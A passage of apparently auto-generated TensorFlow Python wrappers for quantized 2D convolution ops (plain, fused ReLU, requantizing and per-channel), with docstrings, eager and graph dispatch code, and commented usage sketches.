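# Example (illustrative sketch): both `input` and `bias` are quantized tensors
# here, each with its own float min/max range. Assumes TensorFlow 2.x as `tf`;
# values are hypothetical.
#
#   import tensorflow as tf
#
#   x = tf.quantization.quantize(tf.ones([2, 3]), 0.0, 1.0, T=tf.quint8)
#   b = tf.quantization.quantize(
#       tf.constant([0.1, 0.2, 0.3]), 0.0, 1.0, T=tf.quint8)
#   out = tf.raw_ops.QuantizedBiasAdd(
#       input=x.output, bias=b.output,
#       min_input=x.output_min, max_input=x.output_max,
#       min_bias=b.output_min, max_bias=b.output_max,
#       out_type=tf.qint32)
#   # out.output is qint32; out.min_out / out.max_out describe its float range.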
_QuantizedConv2DOutput = collections.namedtuple(
"QuantizedConv2D",
["output", "min_output", "max_output"])
def quantized_conv2d(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], name=None):
r"""Computes a 2D convolution given quantized 4D input and filter tensors.
The inputs are quantized tensors where the lowest quantized value maps to the
real number given by the associated minimum, and the highest quantized value
maps to the associated maximum. The quantized output must be interpreted the
same way, using the returned minimum and maximum values.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The filter's input_depth dimension must match the input's depth dimension.
min_input: A `Tensor` of type `float32`.
The float value that the lowest quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the highest quantized input value represents.
min_filter: A `Tensor` of type `float32`.
The float value that the lowest quantized filter value represents.
max_filter: A `Tensor` of type `float32`.
The float value that the highest quantized filter value represents.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by the
value of `data_format`. Dilations in the batch and
depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2D", name, input, filter, min_input, max_input,
min_filter, max_filter, "out_type", out_type, "strides", strides,
"padding", padding, "dilations", dilations)
_result = _QuantizedConv2DOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2D", input=input, filter=filter, min_input=min_input,
max_input=max_input, min_filter=min_filter,
max_filter=max_filter, strides=strides,
padding=padding, out_type=out_type,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2D", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DOutput._make(_result)
return _result
QuantizedConv2D = tf_export("raw_ops.QuantizedConv2D")(_ops.to_raw_op(quantized_conv2d))
def quantized_conv2d_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations)
_result = _execute.execute(b"QuantizedConv2D", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2D", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DOutput._make(_result)
return _result
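# Example (illustrative sketch): a quantized convolution via `tf.raw_ops`,
# assuming TensorFlow 2.x as `tf`. Shapes, values, and ranges are
# hypothetical; quint8 input with quint8 filter is a commonly supported
# kernel combination.
#
#   import tensorflow as tf
#
#   img = tf.quantization.quantize(
#       tf.random.uniform([1, 8, 8, 3]), 0.0, 1.0, T=tf.quint8)
#   ker = tf.quantization.quantize(
#       tf.random.uniform([3, 3, 3, 8], -1.0, 1.0), -1.0, 1.0, T=tf.quint8)
#   conv = tf.raw_ops.QuantizedConv2D(
#       input=img.output, filter=ker.output,
#       min_input=img.output_min, max_input=img.output_max,
#       min_filter=ker.output_min, max_filter=ker.output_max,
#       strides=[1, 1, 1, 1], padding="SAME", out_type=tf.qint32)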
_QuantizedConv2DAndReluOutput = collections.namedtuple(
"QuantizedConv2DAndRelu",
["output", "min_output", "max_output"])
def quantized_conv2d_and_relu(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DAndRelu", name, input, filter, min_input,
max_input, min_filter, max_filter, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _QuantizedConv2DAndReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_and_relu_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DAndRelu", input=input, filter=filter,
min_input=min_input, max_input=max_input,
min_filter=min_filter,
max_filter=max_filter, strides=strides,
padding=padding, out_type=out_type,
dilations=dilations,
padding_list=padding_list, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndReluOutput._make(_result)
return _result
QuantizedConv2DAndRelu = tf_export("raw_ops.QuantizedConv2DAndRelu")(_ops.to_raw_op(quantized_conv2d_and_relu))
def quantized_conv2d_and_relu_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DAndRelu", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndReluOutput._make(_result)
return _result
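# Example (illustrative call-shape sketch only): the fused conv+ReLU variant
# takes the same arguments as QuantizedConv2D plus an optional `padding_list`
# for explicit padding. Kernels for these fused ops are typically registered
# only in oneDNN/MKL builds of TensorFlow, so a stock build may raise an
# error. Reuses the hypothetical `img`/`ker` from the QuantizedConv2D sketch.
#
#   out = tf.raw_ops.QuantizedConv2DAndRelu(
#       input=img.output, filter=ker.output,
#       min_input=img.output_min, max_input=img.output_max,
#       min_filter=ker.output_min, max_filter=ker.output_max,
#       strides=[1, 1, 1, 1], padding="SAME")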
_QuantizedConv2DAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DAndReluAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_and_relu_and_requantize(input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type=_dtypes.quint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DAndReluAndRequantize", name, input, filter,
min_input, max_input, min_filter, max_filter, min_freezed_output,
max_freezed_output, "out_type", out_type, "strides", strides,
"padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _QuantizedConv2DAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_and_relu_and_requantize_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, out_type=out_type,
strides=strides, padding=padding, dilations=dilations,
padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DAndReluAndRequantize", input=input, filter=filter,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DAndReluAndRequantize = tf_export("raw_ops.QuantizedConv2DAndReluAndRequantize")(_ops.to_raw_op(quantized_conv2d_and_relu_and_requantize))
def quantized_conv2d_and_relu_and_requantize_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DAndReluAndRequantize", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndReluAndRequantizeOutput._make(_result)
return _result
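# Example (illustrative call-shape sketch only): the requantizing variant also
# takes a frozen output range and emits `out_type` (quint8 by default) scaled
# to that range. Same hypothetical inputs and kernel-availability caveats as
# the sketches above.
#
#   out = tf.raw_ops.QuantizedConv2DAndReluAndRequantize(
#       input=img.output, filter=ker.output,
#       min_input=img.output_min, max_input=img.output_max,
#       min_filter=ker.output_min, max_filter=ker.output_max,
#       min_freezed_output=0.0, max_freezed_output=6.0,
#       strides=[1, 1, 1, 1], padding="SAME")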
_QuantizedConv2DAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_and_requantize(input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type=_dtypes.qint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DAndRequantize", name, input, filter, min_input,
max_input, min_filter, max_filter, min_freezed_output,
max_freezed_output, "out_type", out_type, "strides", strides,
"padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _QuantizedConv2DAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_and_requantize_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, out_type=out_type,
strides=strides, padding=padding, dilations=dilations,
padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DAndRequantize", input=input, filter=filter,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
strides=strides, padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DAndRequantize = tf_export("raw_ops.QuantizedConv2DAndRequantize")(_ops.to_raw_op(quantized_conv2d_and_requantize))
def quantized_conv2d_and_requantize_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DAndRequantize", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndRequantizeOutput._make(_result)
return _result
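# Example (illustrative call-shape sketch only): as above but without the
# fused ReLU; note `out_type` defaults to qint8 here rather than quint8, so a
# symmetric frozen range is natural. Hypothetical inputs as before.
#
#   out = tf.raw_ops.QuantizedConv2DAndRequantize(
#       input=img.output, filter=ker.output,
#       min_input=img.output_min, max_input=img.output_max,
#       min_filter=ker.output_min, max_filter=ker.output_max,
#       min_freezed_output=-6.0, max_freezed_output=6.0,
#       strides=[1, 1, 1, 1], padding="SAME")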
_QuantizedConv2DPerChannelOutput = collections.namedtuple(
"QuantizedConv2DPerChannel",
["output", "min_output", "max_output"])
def quantized_conv2d_per_channel(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], name=None):
r"""Computes QuantizedConv2D per channel.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original input tensor.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original filter tensor.
min_input: A `Tensor` of type `float32`.
The minimum value of the input tensor.
max_input: A `Tensor` of type `float32`.
The maximum value of the input tensor.
min_filter: A `Tensor` of type `float32`.
The minimum value of the filter tensor.
max_filter: A `Tensor` of type `float32`.
The maximum value of the filter tensor.
strides: A list of `ints`. The list of stride values.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
The quantized type to which the output tensor is converted.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
The list of dilation values.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DPerChannel", name, input, filter, min_input,
max_input, min_filter, max_filter, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations)
_result = _QuantizedConv2DPerChannelOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_per_channel_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_per_channel' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
